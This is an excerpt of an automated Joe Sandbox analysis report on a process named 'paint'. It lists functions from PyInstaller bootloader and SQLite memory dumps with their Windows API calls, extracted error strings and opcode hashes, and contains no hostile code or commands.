%s at line %d of [%.10s], xrefs: 00007FFDFB08B1C7

Memory Dump Source

Source File: 00000001.00000002.2015138259.00007FFDFB061000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB060000, based on PE: true

Associated: 00000001.00000002.2015020570.00007FFDFB060000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015138259.00007FFDFB1C1000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015138259.00007FFDFB1C3000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015138259.00007FFDFB1D8000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015663978.00007FFDFB1DA000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015698265.00007FFDFB1DC000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfb060000_paint.jbxd

Similarity

API ID: 00007A463010
String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$database corruption
API String ID: 4225454184-3727861699
Opcode ID: 653c5f8135bb0035a4799ee7a04111f8635ea6dcc2a3a0e74a5c84d48665af41
Instruction ID: 395cfd74a16b70cd13c81b2a70f2e5444e36a0140747d96b7d2703e47c5f5e75
Opcode Fuzzy Hash: 653c5f8135bb0035a4799ee7a04111f8635ea6dcc2a3a0e74a5c84d48665af41
Instruction Fuzzy Hash: 44810136B09A828AD7609F25E464BAE77A1FB85784F00C032EB9D477E9CF39D546D700

Function 00007FF6F0BD2910 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 86COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF6F0BD1B6A), ref: 00007FF6F0BD295E

Strings

%s: %s, xrefs: 00007FF6F0BD29E8
Error, xrefs: 00007FF6F0BD2A0E
[PYI-%d:ERROR] , xrefs: 00007FF6F0BD2966
Error [ANSI Fallback], xrefs: 00007FF6F0BD29FF

Memory Dump Source

Source File: 00000001.00000002.2013158606.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000001.00000002.2013118719.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013204446.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013273251.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013273251.00007FF6F0C11000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013345140.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID: CurrentProcess
String ID: %s: %s$Error$Error [ANSI Fallback]$[PYI-%d:ERROR]
API String ID: 2050909247-2962405886
Opcode ID: 9e805cce3db004805378da731f60641a61a9f8723a57293993104ba7ce00817f
Instruction ID: 849db7d120f753c6d905a6fee6b2a74acd22be8ef9b34388b567b721fa819d15
Opcode Fuzzy Hash: 9e805cce3db004805378da731f60641a61a9f8723a57293993104ba7ce00817f
Instruction Fuzzy Hash: EE312626B1968162E7209761A8406E7A395BF897D4F800132EE9EC37C5FF3DD146C300

Function 00007FF6F0BD2390 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF6F0BD23C8
DialogBoxIndirectParamW.USER32 ref: 00007FF6F0BD248E
DeleteObject.GDI32 ref: 00007FF6F0BD24C1
DestroyIcon.USER32 ref: 00007FF6F0BD24D3

Strings

Unhandled exception in script, xrefs: 00007FF6F0BD23F8

Memory Dump Source

Source File: 00000001.00000002.2013158606.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000001.00000002.2013118719.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013204446.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013273251.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013273251.00007FF6F0C11000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013345140.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
String ID: Unhandled exception in script
API String ID: 3081866767-2699770090
Opcode ID: 9d37adb8919aaa9301242e1672c0db5e18d6b44b4274937772719b263de12092
Instruction ID: 13a9d47979c9959116efc00275545185385d379e74e573f891bde93df243b9cd
Opcode Fuzzy Hash: 9d37adb8919aaa9301242e1672c0db5e18d6b44b4274937772719b263de12092
Instruction Fuzzy Hash: 0D31C47660968299EB20DF61F8556F96364FF8A784F800131EE5E87B8AEF3DC104C700

Function 00007FF6F0BD2B50 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 65windowCOMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(?,00000000,00000000,FFFFFFFF,00000000,00007FF6F0BD918F,?,00007FF6F0BD3C55), ref: 00007FF6F0BD2BA0
MessageBoxW.USER32 ref: 00007FF6F0BD2C2A

Strings

Warning, xrefs: 00007FF6F0BD2C1D
WARNING, xrefs: 00007FF6F0BD2BAF
[PYI-%d:%ls] , xrefs: 00007FF6F0BD2BA8

Memory Dump Source

Source File: 00000001.00000002.2013158606.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000001.00000002.2013118719.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013204446.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013273251.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013273251.00007FF6F0C11000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013345140.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID: CurrentMessageProcess
String ID: WARNING$Warning$[PYI-%d:%ls]
API String ID: 1672936522-3797743490
Opcode ID: 9e6d9589c2ecbe46adae8e106eadd318faf54c8367477cb0129d25f7ec3a12f1
Instruction ID: db4af9d99140d13ef61edf2c45e588141658d9e87194cf05147acc2d73963dad
Opcode Fuzzy Hash: 9e6d9589c2ecbe46adae8e106eadd318faf54c8367477cb0129d25f7ec3a12f1
Instruction Fuzzy Hash: D921D166709B81A2E7109B54F8447AA63A5EB89784F800132EA8E9779AEF3DD205C700

Function 00007FF6F0BD2710 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 64COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(?,00000000,00000000,?,00000000,00007FF6F0BD1B99), ref: 00007FF6F0BD2760

Strings

ERROR, xrefs: 00007FF6F0BD276F
Error, xrefs: 00007FF6F0BD27DE
[PYI-%d:%s] , xrefs: 00007FF6F0BD2768
Error [ANSI Fallback], xrefs: 00007FF6F0BD27CF

Memory Dump Source

Source File: 00000001.00000002.2013158606.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000001.00000002.2013118719.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013204446.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013273251.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013273251.00007FF6F0C11000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013345140.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID: CurrentProcess
String ID: ERROR$Error$Error [ANSI Fallback]$[PYI-%d:%s]
API String ID: 2050909247-1591803126
Opcode ID: 16defea7d45dc340f891dcb1518e5bd63c50e449678e4b46de0281de23a8290b
Instruction ID: 58477a0e701500fbf40e235bc99630d023dc2420efa3178a9134585124fcbe38
Opcode Fuzzy Hash: 16defea7d45dc340f891dcb1518e5bd63c50e449678e4b46de0281de23a8290b
Instruction Fuzzy Hash: 2D21A176A19782A2E720DB50B8417E6A3A4EF89384F800131EE9E93799EF3DD5458700

Function 00007FF6F0BE9AF8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 00007FF6F0BE9B1D
GetProcAddress.KERNEL32 ref: 00007FF6F0BE9B33
FreeLibrary.KERNEL32 ref: 00007FF6F0BE9B5A

Strings

CorExitProcess, xrefs: 00007FF6F0BE9B2C
mscoree.dll, xrefs: 00007FF6F0BE9B14

Memory Dump Source

Source File: 00000001.00000002.2013158606.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000001.00000002.2013118719.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013204446.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013273251.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013273251.00007FF6F0C11000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013345140.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 644f40749f2397ccfee8900b191f86882f652c7814ccefc594fcc00cef1e1075
Instruction ID: 1232f706875bfb8d41ec79013348bb84748a80c6e052c3eb01c13e84141742bb
Opcode Fuzzy Hash: 644f40749f2397ccfee8900b191f86882f652c7814ccefc594fcc00cef1e1075
Instruction Fuzzy Hash: 23F04F65A19606A1EB108B64A455B7A5324AF46762F940235DA7FC73E4EF2ED048C300

Function 00007FF6F0BF93D8 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 00007FF6F0BF9400
_set_statfp.LIBCMT ref: 00007FF6F0BF941B
_set_statfp.LIBCMT ref: 00007FF6F0BF9437
_set_statfp.LIBCMT ref: 00007FF6F0BF9473

Memory Dump Source

Source File: 00000001.00000002.2013158606.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000001.00000002.2013118719.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013204446.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013273251.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013273251.00007FF6F0C11000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013345140.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
Instruction ID: 5f7e2e24d6ede3e7840de582d882e6ba251ff8385d6931e8aab55e526dbae262
Opcode Fuzzy Hash: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
Instruction Fuzzy Hash: 0211BF7AE0CA1321F77411A8E456375204C6F7B362F840634EE7FC77DEAE2EA8424100

Function 00007FF6F0BEB400 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE

Download Yara Rule

APIs

FlsGetValue.KERNEL32(?,?,?,00007FF6F0BEA613,?,?,00000000,00007FF6F0BEA8AE,?,?,?,?,?,00007FF6F0BEA83A), ref: 00007FF6F0BEB41F
FlsSetValue.KERNEL32(?,?,?,00007FF6F0BEA613,?,?,00000000,00007FF6F0BEA8AE,?,?,?,?,?,00007FF6F0BEA83A), ref: 00007FF6F0BEB43E
FlsSetValue.KERNEL32(?,?,?,00007FF6F0BEA613,?,?,00000000,00007FF6F0BEA8AE,?,?,?,?,?,00007FF6F0BEA83A), ref: 00007FF6F0BEB466
FlsSetValue.KERNEL32(?,?,?,00007FF6F0BEA613,?,?,00000000,00007FF6F0BEA8AE,?,?,?,?,?,00007FF6F0BEA83A), ref: 00007FF6F0BEB477
FlsSetValue.KERNEL32(?,?,?,00007FF6F0BEA613,?,?,00000000,00007FF6F0BEA8AE,?,?,?,?,?,00007FF6F0BEA83A), ref: 00007FF6F0BEB488

Memory Dump Source

Source File: 00000001.00000002.2013158606.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000001.00000002.2013118719.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013204446.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013273251.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013273251.00007FF6F0C11000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013345140.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 43a5c13e669b9c0dc60c9d5204f3187f9cebb30c335aac4df6ce1d0b58ad24f5
Instruction ID: 5098c67132a8d9191e1c72c378cffcd9c9f5a47eebdc4a4831a1dcb0feceec16
Opcode Fuzzy Hash: 43a5c13e669b9c0dc60c9d5204f3187f9cebb30c335aac4df6ce1d0b58ad24f5
Instruction Fuzzy Hash: 0F114F60B0C643A2FB589725555157A61665F867B0F848374E93FC67D7FE3EB4018301

Function 00007FF6F0BEB294 Relevance: 7.6, APIs: 5, Instructions: 50COMMON

Download Yara Rule

APIs

FlsGetValue.KERNEL32 ref: 00007FF6F0BEB2A5
FlsSetValue.KERNEL32 ref: 00007FF6F0BEB2C4
FlsSetValue.KERNEL32 ref: 00007FF6F0BEB2EC
FlsSetValue.KERNEL32 ref: 00007FF6F0BEB2FD
FlsSetValue.KERNEL32 ref: 00007FF6F0BEB30E

Memory Dump Source

Source File: 00000001.00000002.2013158606.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000001.00000002.2013118719.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013204446.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013273251.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013273251.00007FF6F0C11000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013345140.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 8aa69c65082f5ed190463b1c2d732539134b8ecb86da000f77e4666776fecf75
Instruction ID: d1fdb636a646d318e2a35fc9ebbffe2a19788d3f82a7c43097d109001c88b5c2
Opcode Fuzzy Hash: 8aa69c65082f5ed190463b1c2d732539134b8ecb86da000f77e4666776fecf75
Instruction Fuzzy Hash: A6111560E0C207A2FFA86621445267E22924F47331F9897B4D93FCA3C3FD3EB4018241

Function 00007FFDFB0E97D0 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 288COMMON

Download Yara Rule

APIs

00007FFE1A463010.VCRUNTIME140(?,?,?,?,?,?,?,00000000,00000000,?,00000003,00000000,00007FFDFB0EA007,?,00000007,?), ref: 00007FFDFB0E9997

Strings

rowid, xrefs: 00007FFDFB0E9928
%.*z:%u, xrefs: 00007FFDFB0E9A66
column%d, xrefs: 00007FFDFB0E99A5

Memory Dump Source

Source File: 00000001.00000002.2015138259.00007FFDFB061000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB060000, based on PE: true

Associated: 00000001.00000002.2015020570.00007FFDFB060000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015138259.00007FFDFB1C1000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015138259.00007FFDFB1C3000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015138259.00007FFDFB1D8000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015663978.00007FFDFB1DA000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015698265.00007FFDFB1DC000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfb060000_paint.jbxd

Similarity

API ID: 00007A463010
String ID: %.*z:%u$column%d$rowid
API String ID: 4225454184-2903559916
Opcode ID: de542e699cf8672dba119d4255c91745efac7170ddd7288360a155c55f50754c
Instruction ID: 5847e663ec4b9178cb8e39190492a40c0065320bf1a875949bf7f3c124f3d10c
Opcode Fuzzy Hash: de542e699cf8672dba119d4255c91745efac7170ddd7288360a155c55f50754c
Instruction Fuzzy Hash: BAB1CC22B0B68385EB258B15D560BBA67A1AF82BD4F494135DE6D077F9DF3CE801E340

Function 00007FF6F0BE6010 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 242COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6F0BE604C
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6F0BE6176
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6F0BE622C

Strings

verbose, xrefs: 00007FF6F0BE6020

Memory Dump Source

Source File: 00000001.00000002.2013158606.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000001.00000002.2013118719.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013204446.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013273251.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013273251.00007FF6F0C11000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013345140.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: verbose
API String ID: 3215553584-579935070
Opcode ID: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
Instruction ID: c55df2e6c0694ca746d1b9d050d2184e989314500516ef87d857b70608070f5a
Opcode Fuzzy Hash: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
Instruction Fuzzy Hash: 6291CE32A08A46A1F7668E24D45037D33A1AB42BD4FC44276DA6F873D6FF3EE8058301

Function 00007FFDFB0F8620 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 239COMMON

Download Yara Rule

APIs

00007FFE1A463010.VCRUNTIME140(?,?,?,?,00000080,?,?,?,00000000,00007FFDFB0F8AEF), ref: 00007FFDFB0F87B9
00007FFE1A463010.VCRUNTIME140(?,?,?,?,00000080,?,?,?,00000000,00007FFDFB0F8AEF), ref: 00007FFDFB0F883B
00007FFE1A463010.VCRUNTIME140(?,?,?,?,00000080,?,?,?,00000000,00007FFDFB0F8AEF), ref: 00007FFDFB0F892D

Strings

RETURNING may not use "TABLE.*" wildcards, xrefs: 00007FFDFB0F86A1

Memory Dump Source

Source File: 00000001.00000002.2015138259.00007FFDFB061000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB060000, based on PE: true

Associated: 00000001.00000002.2015020570.00007FFDFB060000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015138259.00007FFDFB1C1000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015138259.00007FFDFB1C3000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015138259.00007FFDFB1D8000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015663978.00007FFDFB1DA000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015698265.00007FFDFB1DC000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfb060000_paint.jbxd

Similarity

API ID: 00007A463010
String ID: RETURNING may not use "TABLE.*" wildcards
API String ID: 4225454184-2313493979
Opcode ID: de7df61d44113aac0f43340fdba581afba9acef06b86af9c148db057996b514c
Instruction ID: f7ca29ccc4ec22a40a81ed36af1ea1a11f114e3cf5c16357c94f99f45b677881
Opcode Fuzzy Hash: de7df61d44113aac0f43340fdba581afba9acef06b86af9c148db057996b514c
Instruction Fuzzy Hash: 57B17F22B0ABC285EB10CF159450AA96BA1FB56BA4F098335DA7D077E9DF38E1559300

Function 00007FFDFB0AD460 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 220COMMON

Download Yara Rule

APIs

00007FFE1A463010.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,00007FFDFB0A78D7), ref: 00007FFDFB0AD5BA
00007FFE1A463010.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,00007FFDFB0A78D7), ref: 00007FFDFB0AD5E4
00007FFE1A463010.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,00007FFDFB0A78D7), ref: 00007FFDFB0AD637

Strings

H, xrefs: 00007FFDFB0AD5CE

Memory Dump Source

Source File: 00000001.00000002.2015138259.00007FFDFB061000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB060000, based on PE: true

Associated: 00000001.00000002.2015020570.00007FFDFB060000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015138259.00007FFDFB1C1000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015138259.00007FFDFB1C3000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015138259.00007FFDFB1D8000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015663978.00007FFDFB1DA000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015698265.00007FFDFB1DC000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfb060000_paint.jbxd

Similarity

API ID: 00007A463010
String ID: H
API String ID: 4225454184-2852464175
Opcode ID: 94caf086f54589942c1a3f8dca44f9cf8cc577e0f8a3d8302a345ad245eb559f
Instruction ID: abaafd8788b900623d3e2c26d863d861c9761cacc704a2c34dac7756361c2e46
Opcode Fuzzy Hash: 94caf086f54589942c1a3f8dca44f9cf8cc577e0f8a3d8302a345ad245eb559f
Instruction Fuzzy Hash: 1291B566B1A64286EB248E25D450B7977A8FB46F94F144B34DE7D0B7E8CF3CE450AB00

Function 00007FF6F0BEFC38 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 219COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6F0BEFF17

Part of subcall function 00007FF6F0BE7AAC: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6F0BE7AC9

Strings

UTF-8, xrefs: 00007FF6F0BEFE96
UTF-16LEUNICODE, xrefs: 00007FF6F0BEFEB5
ccs, xrefs: 00007FF6F0BEFE52

Memory Dump Source

Source File: 00000001.00000002.2013158606.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000001.00000002.2013118719.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013204446.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013273251.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013273251.00007FF6F0C11000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013345140.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: UTF-16LEUNICODE$UTF-8$ccs
API String ID: 3215553584-1196891531
Opcode ID: 4ea7f6e1ba59c177a711b7ec70ee344f27d005a52efb2894dd87f7f788f8515e
Instruction ID: 56de44e8f1467f795415ae8338c1b721cc165b2d436b73675951195d09786025
Opcode Fuzzy Hash: 4ea7f6e1ba59c177a711b7ec70ee344f27d005a52efb2894dd87f7f788f8515e
Instruction Fuzzy Hash: 73818F72F08243A5FB644E2585102782AA0EB13B49FE580B5DA2BD73D6FF2FB9019341

Function 00007FFDFB0E9470 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 198COMMON

Download Yara Rule

Strings

rowid, xrefs: 00007FFDFB0E95CE
%s.%s, xrefs: 00007FFDFB0E95EE
column%d, xrefs: 00007FFDFB0E9678

Memory Dump Source

Source File: 00000001.00000002.2015138259.00007FFDFB061000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB060000, based on PE: true

Associated: 00000001.00000002.2015020570.00007FFDFB060000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015138259.00007FFDFB1C1000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015138259.00007FFDFB1C3000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015138259.00007FFDFB1D8000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015663978.00007FFDFB1DA000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015698265.00007FFDFB1DC000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfb060000_paint.jbxd

Similarity

API ID:
String ID: %s.%s$column%d$rowid
API String ID: 0-1505470444
Opcode ID: de587f384be9fed1cc3d352f6a517015bb48ff4a3a33b04db7dd4cf98bea7dec
Instruction ID: d0de9d4ce39a7e84df84abcb4e442a132cdc24553f5ac11bb47509a1c9a623ab
Opcode Fuzzy Hash: de587f384be9fed1cc3d352f6a517015bb48ff4a3a33b04db7dd4cf98bea7dec
Instruction Fuzzy Hash: 81919A72B0AB8285EB20CB15E464BA967A4FB46BE4F454336DABC077E8DF39D041D700

Function 00007FFDFB088A30 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 192COMMON

Download Yara Rule

Strings

database corruption, xrefs: 00007FFDFB088AEF
8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355, xrefs: 00007FFDFB088ADC
%s at line %d of [%.10s], xrefs: 00007FFDFB088AF6

Memory Dump Source

Source File: 00000001.00000002.2015138259.00007FFDFB061000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB060000, based on PE: true

Associated: 00000001.00000002.2015020570.00007FFDFB060000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015138259.00007FFDFB1C1000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015138259.00007FFDFB1C3000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015138259.00007FFDFB1D8000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015663978.00007FFDFB1DA000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015698265.00007FFDFB1DC000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfb060000_paint.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$database corruption
API String ID: 0-3727861699
Opcode ID: be111bc764e9eb46fb0fceec14cef625345d2311889ec31baec9b19fb1852189
Instruction ID: e20ef2ec87dfdbb571ca5b793f889e6cedf107206a0e9a24fb3bef14bd97cd8d
Opcode Fuzzy Hash: be111bc764e9eb46fb0fceec14cef625345d2311889ec31baec9b19fb1852189
